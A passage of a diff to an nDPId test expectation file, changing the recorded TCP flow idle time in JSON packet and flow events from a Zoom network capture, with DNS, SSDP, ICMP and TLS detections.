00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520466531,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520467811,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEABEHgAAAQEICiWc1TCZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} 
-00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569520467811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520467811,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEABEHgAAAQEICiWc1TCZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} 
+00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569520468207,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1569520468207,"pkt":"AQBef\/\/6KDc3AG3ICABFAACaDxkAAAER+CLAqAF17\/\/\/+t7BB2wAhjkTTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 
00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -30,27 +30,27 @@ 00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569520468958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569520468958,"pkt":"KDc3AG3IEBMx8Tl2CABFAABJ++kAADcRA\/TAqAEBwKgBdQA1+2AANbDee1+BgAABAAEAAAAAA2xvZwR6b29tAnVzAAABAAHADAABAAEAAAA8AAQ0yj7u"} 00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520468958,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": 
{"query":"log.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.238"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468959,"flow_last_seen":1569520468959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520468959,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569520468959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520468959,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOPAqAF1NMo+7tZQAbuf1vAbAAAAALAC\/\/+Z4QAAAgQFtAEDAwUBAQgKJZzZqwAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468959,"flow_last_seen":1569520468959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520468959,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569520468959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520468959,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOPAqAF1NMo+7tZQAbuf1vAbAAAAALAC\/\/+Z4QAAAgQFtAEDAwUBAQgKJZzZqwAAAAAEAgAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569520469036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569520469036,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAzKPoAAP8RDvnAqAF1wKgBAf9yADUAH9x7wYgBAAABAAAAAAAABWxvY2FsAAAGAAE="} 
00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569520469067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469067,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVu40yj7uwKgBdQG71lCVbT6Un9bwHIASaQOUKgAAAgQFrAEBBAIBAwMM"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569520469067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469067,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBPvAqAF1NMo+7tZQAbuf1vAclW0+lVAQIAAd\/QAA"} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569520469067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469067,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVu40yj7uwKgBdQG71lCVbT6Un9bwHIASaQOUKgAAAgQFrAEBBAIBAwMM"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569520469067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469067,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBPvAqAF1NMo+7tZQAbuf1vAclW0+lVAQIAAd\/QAA"} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569520469072,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1569520469072,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB+D5oAADcR8A7AqAEBwKgBdQA1\/3IAaoTewYiBgwABAAAAAQAABWxvY2FsAAAGAAEAAAYAAQAACY8AQAFhDHJvb3Qtc2VydmVycwNuZXQABW5zdGxkDHZlcmlzaWduLWdycwNjb20AeFjoeAAABwgAAAOEAAk6gAABUYA="} 
00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569520469072,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469072,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4d+0AAEABfxHAqAF1wKgBAQMD\/OoAAAAARQAAfg+aAAA3EfAOwKgBAcCoAXUANf9yAGoAAA=="} 
00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.637537} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469081,"flow_last_seen":1569520469081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520469081,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569520469081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAog\/0AAEAG0h7AqAF1DeFUttYOAbuSOQajVAdu1VAQECZHdwAA"} 
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1569520469116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAAoaEVAAO8G\/tUN4VS2wKgBdQG71g5UB27VAAAAAFAEAADwhQAAAAAAAAAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469081,"flow_last_seen":1569520469081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520469081,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569520469081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAog\/0AAEAG0h7AqAF1DeFUttYOAbuSOQajVAdu1VAQECZHdwAA"} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569520469116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1569520469116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAAoaEVAAO8G\/tUN4VS2wKgBdQG71g5UB27VAAAAAFAEAADwhQAAAAAAAAAA"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469189,"flow_last_seen":1569520469189,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569520469189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABICu4AAEAR5YzAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569520469200,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469200,"pkt":"EBMx8Tl2KDc3AG3ICABFAABISukAAEARpZHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 
-00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain 
